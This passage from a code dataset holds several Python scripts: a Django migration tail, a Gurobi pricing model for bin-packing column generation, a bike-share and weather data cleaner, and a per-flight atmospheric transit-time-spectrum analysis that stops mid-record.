model_name='tagtraduit',\n name='tag',\n field=models.ForeignKey(related_name='tag', default=None, blank=True, to='app.TagBase', help_text=\"C'est le tag r\\xe9f\\xe9rent\", null=True),\n ),\n ]\n","repo_name":"super0605/cogofly-v1","sub_path":"app/migrations/0095_auto_20160321_1720.py","file_name":"0095_auto_20160321_1720.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"39598653194","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# @Time : 2020/9/25 21:51\r\n# Author: Zheng Shaoxiang\r\n# @Email : zhengsx95@163.com\r\n# Description:\r\nfrom labelSetting import LabelSetting\r\nfrom gurobipy import *\r\n\r\n\r\nclass Pricing:\r\n def __init__(self, s, use_model=False):\r\n self.data = None\r\n self.s = s # ((1, 2, 3), (4, 5, 6),...)\r\n self.n = None\r\n self.graph = None\r\n self.pricing = None # Model()\r\n self.y, self.z = None, None\r\n self.use_model = use_model # 使用模型求解\r\n self.lab = None # LabelSetting类\r\n\r\n def build_model(self, data, graph):\r\n self.pricing = Model(\"pricing\")\r\n\r\n item_id = [item.id for item in data.items]\r\n w = {item.id: item.width for item in data.items}\r\n self.y = self.pricing.addVars(item_id, vtype=GRB.BINARY, name=\"y\")\r\n\r\n self.pricing.addConstr(quicksum(self.y[i] * w[i] for i in item_id) <= data.capacity, name=\"capacity\")\r\n\r\n if self.s is not None:\r\n self.z = self.pricing.addVars(self.s, vtype=GRB.BINARY, name=\"z\")\r\n\r\n # self.s中item id可能已经被删除,因此添加条件i in item_id and j in item_id\r\n self.pricing.addConstrs((self.z[s] >= self.y[i] + self.y[j] - 1\r\n for s in self.s for i in s for j in s if i < j and i in item_id and j in item_id),\r\n name=\"sr_constr1\")\r\n self.pricing.addConstrs((self.z[s] <= self.y[i] + self.y[j]\r\n for s in self.s for i in s for j in s if i < j and i in item_id and j in item_id),\r\n name=\"sr_constr2\")\r\n if graph.has_node(): # 图不为空\r\n self.pricing.addConstrs((self.y[i] + self.y[j] <= 1\r\n for i, j in graph.get_all_edges()), name=\"incompatibility\")\r\n self.pricing.ModelSense = GRB.MAXIMIZE\r\n self.set_parameters()\r\n\r\n def set_parameters(self):\r\n self.pricing.Params.OutputFlag = False\r\n\r\n def update_objective(self, exact, sr):\r\n self.pricing.update()\r\n for x, v in zip(self.y.values(), exact):\r\n x.obj = v\r\n if self.z is not None:\r\n for x, v in zip(self.z.values(), sr):\r\n x.obj = v\r\n\r\n def optimize(self):\r\n self.pricing.update()\r\n self.pricing.optimize()\r\n\r\n def get_reduced_cost(self):\r\n\r\n if self.use_model:\r\n return 1 - self.pricing.objVal\r\n else:\r\n if self.lab.labels:\r\n return self.lab.labels[0].c\r\n return 0\r\n\r\n def getConstrs(self):\r\n return self.pricing.getConstrs()\r\n\r\n def get_coe(self):\r\n sr_coe = []\r\n if self.use_model:\r\n # round() 为避免数值误差\r\n exact_coe = [round(v.x) for v in self.y.values()]\r\n if self.s is not None:\r\n sr_coe = [round(v.x) for v in self.z.values()]\r\n res = [exact_coe + sr_coe]\r\n else:\r\n res = []\r\n for label in self.lab.labels:\r\n exact_coe = [1 if i in label.v else 0 for i in range(self.n)]\r\n sr_coe = label.z\r\n res.append(exact_coe + sr_coe)\r\n\r\n return res\r\n\r\n def solve(self, ex_dual, sr_dual, data, graph):\r\n \"\"\"\r\n :param ex_dual: list[]\r\n :param sr_dual: list[]\r\n :param data:\r\n :param graph:\r\n :return:\r\n \"\"\"\r\n if self.use_model:\r\n self.build_model(data, graph)\r\n self.update_objective(ex_dual, sr_dual)\r\n self.optimize()\r\n else:\r\n self.n = data.n\r\n self.lab = LabelSetting(data, self.s, ex_dual, sr_dual, graph)\r\n self.lab.solve()\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n","repo_name":"shaoxiang-zheng/Branch-and-price-for-one-dimensional-bin-packing","sub_path":"pricing.py","file_name":"pricing.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"92"} +{"seq_id":"20905003914","text":"import os\nimport sys\nimport shutil\nimport pandas as pd\nfrom dateutil import parser\nimport traceback\nimport zipfile\nfrom tqdm import tqdm\n\nfrom joblib.memory import Memory\n\nimport station_name\n\nprint('loading data...')\nwith zipfile.ZipFile('brut.zip') as myzip:\n with myzip.open('brut/weather_bicincitta_parma.csv') as myfile:\n weather = pd.read_csv(myfile, delimiter=';', header=None, names=[\"Timestamp\", \"Status\", \"Clouds\", \"Humidity\", \"Pressure\", \"Rain\", \"WindGust\", \"WindVarEnd\", \"WindVarBeg\", \"WindDeg\", \"WindSpeed\", \"Snow\", \"TemperatureMax\", \"TemperatureMin\", \"TemperatureTemp\"])\n with myzip.open('brut/status_bicincitta_parma.csv') as myfile:\n bike = pd.read_csv(myfile, sep=';', header=None, names=[\"Timestamp\",\"Station\",\"Status\",\"Bikes\",\"Slots\"])\n # with myzip.open('brut/bicincitta_parma_summary.csv') as myfile:\n # stations = pd.read_csv(myfile, delimiter=';')\nprint('data loaded')\n\ndef parse_date(df):\n def valid_datetime(date):\n try:\n return parser.parse(date)\n except ValueError:\n print(\"Invalid date:\", date)\n return None\n df['Timestamp'] = df['Timestamp'].apply(valid_datetime)\n return df\n\ndef clean_timestamp(df):\n df = df[df[\"Timestamp\"] != None]\n return df\n\ndef clean_bike_data(bike_df):\n bike_df = clean_timestamp(bike_df)\n bike_df = bike_df[bike_df[\"Status\"] == 1]\n return bike_df\n\n# ///////////// Weather ///////////////////\n\nprint('parsing and cleaning weather data')\n# drop useless columns\nweather = weather.drop(columns = ['Clouds', 'WindGust', 'WindVarEnd', 'WindVarBeg', 'TemperatureMax', 'TemperatureMin'])\n\n# parse datetimes\nweather = parse_date(weather)\nweather = clean_timestamp(weather)\n# print(weather.head(10))\n\nweather = weather.set_index('Timestamp').resample('10min', label='right', closed='right').last().dropna().reset_index()\n# print(weather.head(10))\n\n# ////////////// Bike ////////////////////\n\nprint('parsing and cleaning bike data')\nbike = parse_date(bike)\nbike = clean_bike_data(bike)\n# print(bike.head(10))\n\n# normalize names\nbike['Station'] = bike['Station'].apply(lambda name: station_name.names[name])\nbike = bike.drop(columns = ['Status'])\nbike['Total'] = bike['Bikes'] + bike['Slots']\nStations = []\n\n# resample, merge and split\nprint('resampling and merging data')\nfor cle, df in bike.groupby('Station'):\n # print(cle, df)\n df = df.set_index('Timestamp').resample('10min', label='right', closed='right').last().dropna().reset_index()\n df = df.merge(weather, on='Timestamp')\n Stations.append(df)\n # print(df.head(5))\n\n\nprint('Creation des dossiers et fichiers: ')\n\npathStations = \"./Stations\"\nif not os.path.exists(pathStations):\n os.mkdir(pathStations)\n\nlenStations = len(Stations)\ncountStation = 0\n\nfor station in Stations:\n countStation += 1\n print('Station ' + str(countStation) + '/' + str(lenStations) + ' :')\n\n pathSpecificStation = pathStations + '/' + station['Station'][0].replace('. ', '_')\n\n if not os.path.exists(pathSpecificStation):\n os.mkdir(pathSpecificStation)\n\n # split on time's gap\n counter = 1\n previousTime = station['Timestamp'][0]\n minIndex = 0\n maxIndex = len(station['Timestamp']) - 1\n # print('je passe là')\n\n for t in tqdm(range(maxIndex + 1)):\n\n diff = station['Timestamp'][t] - previousTime\n diffMin = diff.seconds / 60.\n # print(diffMin)\n\n if(diffMin - 10 > 0.001):\n station.loc[minIndex : t].set_index('Timestamp').to_csv(pathSpecificStation + '/' + str(counter) + '.csv.gz', compression='gzip')\n counter += 1\n minIndex = t+1\n\n previousTime = station['Timestamp'][t]\n\n station.loc[minIndex : maxIndex].set_index('Timestamp').to_csv(pathSpecificStation + '/' + str(counter) + '.csv.gz', compression='gzip')\n","repo_name":"JMSaindon/DonneesBrutesVelo","sub_path":"DonneesBrutes/exoDonneesBrutes.py","file_name":"exoDonneesBrutes.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"24115384327","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# script to get TTS for all UT segments \n# date created: 3/2/2020\n# author: sofia chelpon\n############################ PREP WORKSPACE ############################\nimport numpy as np \nimport pandas as pd\n\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\n# import my TTS module, need to add path to folder\nimport sys\nsys.path.insert(1, '/UTLS/schelpon/TTS_2020/base_tts_code/')\nimport tts_mod\n\n# read in ratios dataframe\npath = \"/UTLS/schelpon/TTS_2020/get_tts/tts_vary_ut/data_prep/contrast_ratios_ut_seg.pkl\"\ncontrast_ratios = pd.read_pickle(path)\ninfo = contrast_ratios.iloc[[0, 1]]\nsegment_info = info.drop(columns = 'Instrument').drop(columns = 'BL_tau').drop(columns = 'TROPO_tau').drop(columns = 'UT_tau')\nseg_info = segment_info.transpose()\n\n# get index of each flight \nidx_rf05 = seg_info[seg_info['Flight'] == 'RF05'].index.tolist()\nidx_rf06 = seg_info[seg_info['Flight'] == 'RF06'].index.tolist()\nidx_rf07 = seg_info[seg_info['Flight'] == 'RF07'].index.tolist()\nidx_rf08 = seg_info[seg_info['Flight'] == 'RF08'].index.tolist()\nidx_rf09 = seg_info[seg_info['Flight'] == 'RF09'].index.tolist()\nidx_rf10 = seg_info[seg_info['Flight'] == 'RF10'].index.tolist()\nidx_rf11 = seg_info[seg_info['Flight'] == 'RF11'].index.tolist()\nidx_rf12 = seg_info[seg_info['Flight'] == 'RF12'].index.tolist()\nidx_rf13 = seg_info[seg_info['Flight'] == 'RF13'].index.tolist()\nidx_rf14 = seg_info[seg_info['Flight'] == 'RF14'].index.tolist()\n\n# sort \nratios_sort = contrast_ratios\nratios_sort = ratios_sort.drop('Time_UTC').drop('Flight')\nratios_sort = ratios_sort.sort_values(['BL_tau'])\n\n# save ordered bl tau as a variable \ntau = ratios_sort['BL_tau']\n\n# drop uncecessary columns \nratios_sort = ratios_sort.drop(columns = ['Instrument', 'BL_tau', 'TROPO_tau', 'UT_tau'])\nratios_sort.head()\n\n\n\n###############################################################################################\n################################ \t\tRF 05 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf05 = []\nmean_rf05 = []\nmode_rf05 = []\nnum = []\nbestk_rf05 = []\n\nutbl_rf05 = pd.DataFrame()\nmustar_rf05 = pd.DataFrame()\ngf_rf05 = pd.DataFrame()\nt_rf05 = pd.DataFrame()\ntau_rf05 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf05].columns: \n utbl_rf05[col] = ''\n mustar_rf05[col] = ''\n gf_rf05[col] = ''\n t_rf05[col] = ''\n tau_rf05[col] = ''\n\n# lgnth of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf05]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf05.append(best_k)\n r2_rf05.append(my_r2)\n mean_rf05.append(mean_age)\n mode_rf05.append(mode_age)\n # ----- save to dataframes\n utbl_rf05[col] = np.ndarray.flatten(my_utbl)\n mustar_rf05[col] = np.ndarray.flatten(my_mustar)\n tau_rf05[col] = np.ndarray.flatten(my_tau)\n gf_rf05[col] = np.ndarray.flatten(my_gf)\n t_rf05[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf05 = seg_info[seg_info['Flight'] == 'RF05']\n\nsegment_info_rf05['r squared'] = r2_rf05\nsegment_info_rf05['mean age'] = mean_rf05\nsegment_info_rf05['mode age'] = mode_rf05\nsegment_info_rf05['best k'] = bestk_rf05\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf05.pkl')\n\n# save others \nutbl_rf05.to_pickle('./perflight_output/utbl_rf05.pkl')\nmustar_rf05.to_pickle('./perflight_output/mustar_rf05.pkl')\ntau_rf05.to_pickle('./perflight_output/tau_rf05.pkl')\ngf_rf05.to_pickle('./perflight_output/gf_rf05.pkl')\nt_rf05.to_pickle('./perflight_output/t_rf05.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 06 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf06 = []\nmean_rf06 = []\nmode_rf06 = []\nnum = []\nbestk_rf06 = []\n\nutbl_rf06 = pd.DataFrame()\nmustar_rf06 = pd.DataFrame()\ngf_rf06 = pd.DataFrame()\nt_rf06 = pd.DataFrame()\ntau_rf06 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf06].columns: \n utbl_rf06[col] = ''\n mustar_rf06[col] = ''\n gf_rf06[col] = ''\n t_rf06[col] = ''\n tau_rf06[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf06]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf06.append(best_k)\n r2_rf06.append(my_r2)\n mean_rf06.append(mean_age)\n mode_rf06.append(mode_age)\n # ----- save to dataframes\n utbl_rf06[col] = np.ndarray.flatten(my_utbl)\n mustar_rf06[col] = np.ndarray.flatten(my_mustar)\n tau_rf06[col] = np.ndarray.flatten(my_tau)\n gf_rf06[col] = np.ndarray.flatten(my_gf)\n t_rf06[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf06 = seg_info[seg_info['Flight'] == 'RF06']\n\nsegment_info_rf06['r squared'] = r2_rf06\nsegment_info_rf06['mean age'] = mean_rf06\nsegment_info_rf06['mode age'] = mode_rf06\nsegment_info_rf06['best k'] = bestk_rf06\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf06.pkl')\n\n# save others \nutbl_rf06.to_pickle('./perflight_output/utbl_rf06.pkl')\nmustar_rf06.to_pickle('./perflight_output/mustar_rf06.pkl')\ntau_rf06.to_pickle('./perflight_output/tau_rf06.pkl')\ngf_rf06.to_pickle('./perflight_output/gf_rf06.pkl')\nt_rf06.to_pickle('./perflight_output/t_rf06.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 07 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf07 = []\nmean_rf07 = []\nmode_rf07 = []\nnum = []\nbestk_rf07 = []\n\nutbl_rf07 = pd.DataFrame()\nmustar_rf07 = pd.DataFrame()\ngf_rf07 = pd.DataFrame()\nt_rf07 = pd.DataFrame()\ntau_rf07 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf07].columns: \n utbl_rf07[col] = ''\n mustar_rf07[col] = ''\n gf_rf07[col] = ''\n t_rf07[col] = ''\n tau_rf07[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf07]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf07.append(best_k)\n r2_rf07.append(my_r2)\n mean_rf07.append(mean_age)\n mode_rf07.append(mode_age)\n # ----- save to dataframes\n utbl_rf07[col] = np.ndarray.flatten(my_utbl)\n mustar_rf07[col] = np.ndarray.flatten(my_mustar)\n tau_rf07[col] = np.ndarray.flatten(my_tau)\n gf_rf07[col] = np.ndarray.flatten(my_gf)\n t_rf07[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf07 = seg_info[seg_info['Flight'] == 'RF07']\n\nsegment_info_rf07['r squared'] = r2_rf07\nsegment_info_rf07['mean age'] = mean_rf07\nsegment_info_rf07['mode age'] = mode_rf07\nsegment_info_rf07['best k'] = bestk_rf07\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf07.pkl')\n\n# save others \nutbl_rf07.to_pickle('./perflight_output/utbl_rf07.pkl')\nmustar_rf07.to_pickle('./perflight_output/mustar_rf07.pkl')\ntau_rf07.to_pickle('./perflight_output/tau_rf07.pkl')\ngf_rf07.to_pickle('./perflight_output/gf_rf07.pkl')\nt_rf07.to_pickle('./perflight_output/t_rf07.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 08 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf08 = []\nmean_rf08 = []\nmode_rf08 = []\nnum = []\nbestk_rf08 = []\n\nutbl_rf08 = pd.DataFrame()\nmustar_rf08 = pd.DataFrame()\ngf_rf08 = pd.DataFrame()\nt_rf08 = pd.DataFrame()\ntau_rf08 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf08].columns: \n utbl_rf08[col] = ''\n mustar_rf08[col] = ''\n gf_rf08[col] = ''\n t_rf08[col] = ''\n tau_rf08[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf08]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf08.append(best_k)\n r2_rf08.append(my_r2)\n mean_rf08.append(mean_age)\n mode_rf08.append(mode_age)\n # ----- save to dataframes\n utbl_rf08[col] = np.ndarray.flatten(my_utbl)\n mustar_rf08[col] = np.ndarray.flatten(my_mustar)\n tau_rf08[col] = np.ndarray.flatten(my_tau)\n gf_rf08[col] = np.ndarray.flatten(my_gf)\n t_rf08[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf08 = seg_info[seg_info['Flight'] == 'RF08']\n\nsegment_info_rf08['r squared'] = r2_rf08\nsegment_info_rf08['mean age'] = mean_rf08\nsegment_info_rf08['mode age'] = mode_rf08\nsegment_info_rf08['best k'] = bestk_rf08\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf08.pkl')\n\n# save others \nutbl_rf08.to_pickle('./perflight_output/utbl_rf08.pkl')\nmustar_rf08.to_pickle('./perflight_output/mustar_rf08.pkl')\ntau_rf08.to_pickle('./perflight_output/tau_rf08.pkl')\ngf_rf08.to_pickle('./perflight_output/gf_rf08.pkl')\nt_rf08.to_pickle('./perflight_output/t_rf08.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 09 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf09 = []\nmean_rf09 = []\nmode_rf09 = []\nnum = []\nbestk_rf09 = []\n\nutbl_rf09 = pd.DataFrame()\nmustar_rf09 = pd.DataFrame()\ngf_rf09 = pd.DataFrame()\nt_rf09 = pd.DataFrame()\ntau_rf09 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf09].columns: \n utbl_rf09[col] = ''\n mustar_rf09[col] = ''\n gf_rf09[col] = ''\n t_rf09[col] = ''\n tau_rf09[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf09]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf09.append(best_k)\n r2_rf09.append(my_r2)\n mean_rf09.append(mean_age)\n mode_rf09.append(mode_age)\n # ----- save to dataframes\n utbl_rf09[col] = np.ndarray.flatten(my_utbl)\n mustar_rf09[col] = np.ndarray.flatten(my_mustar)\n tau_rf09[col] = np.ndarray.flatten(my_tau)\n gf_rf09[col] = np.ndarray.flatten(my_gf)\n t_rf09[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf09 = seg_info[seg_info['Flight'] == 'RF09']\n\nsegment_info_rf09['r squared'] = r2_rf09\nsegment_info_rf09['mean age'] = mean_rf09\nsegment_info_rf09['mode age'] = mode_rf09\nsegment_info_rf09['best k'] = bestk_rf09\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf09.pkl')\n\n# save others \nutbl_rf09.to_pickle('./perflight_output/utbl_rf09.pkl')\nmustar_rf09.to_pickle('./perflight_output/mustar_rf09.pkl')\ntau_rf09.to_pickle('./perflight_output/tau_rf09.pkl')\ngf_rf09.to_pickle('./perflight_output/gf_rf09.pkl')\nt_rf09.to_pickle('./perflight_output/t_rf09.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 10 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf10 = []\nmean_rf10 = []\nmode_rf10 = []\nnum = []\nbestk_rf10 = []\n\nutbl_rf10 = pd.DataFrame()\nmustar_rf10 = pd.DataFrame()\ngf_rf10 = pd.DataFrame()\nt_rf10 = pd.DataFrame()\ntau_rf10 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf10].columns: \n utbl_rf10[col] = ''\n mustar_rf10[col] = ''\n gf_rf10[col] = ''\n t_rf10[col] = ''\n tau_rf10[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf10]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf10.append(best_k)\n r2_rf10.append(my_r2)\n mean_rf10.append(mean_age)\n mode_rf10.append(mode_age)\n # ----- save to dataframes\n utbl_rf10[col] = np.ndarray.flatten(my_utbl)\n mustar_rf10[col] = np.ndarray.flatten(my_mustar)\n tau_rf10[col] = np.ndarray.flatten(my_tau)\n gf_rf10[col] = np.ndarray.flatten(my_gf)\n t_rf10[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf10 = seg_info[seg_info['Flight'] == 'RF10']\n\nsegment_info_rf10['r squared'] = r2_rf10\nsegment_info_rf10['mean age'] = mean_rf10\nsegment_info_rf10['mode age'] = mode_rf10\nsegment_info_rf10['best k'] = bestk_rf10\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf10.pkl')\n\n# save others \nutbl_rf10.to_pickle('./perflight_output/utbl_rf10.pkl')\nmustar_rf10.to_pickle('./perflight_output/mustar_rf10.pkl')\ntau_rf10.to_pickle('./perflight_output/tau_rf10.pkl')\ngf_rf10.to_pickle('./perflight_output/gf_rf10.pkl')\nt_rf10.to_pickle('./perflight_output/t_rf10.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 11 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf11 = []\nmean_rf11 = []\nmode_rf11 = []\nnum = []\nbestk_rf11 = []\n\nutbl_rf11 = pd.DataFrame()\nmustar_rf11 = pd.DataFrame()\ngf_rf11 = pd.DataFrame()\nt_rf11 = pd.DataFrame()\ntau_rf11 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf11].columns: \n utbl_rf11[col] = ''\n mustar_rf11[col] = ''\n gf_rf11[col] = ''\n t_rf11[col] = ''\n tau_rf11[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf11]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau 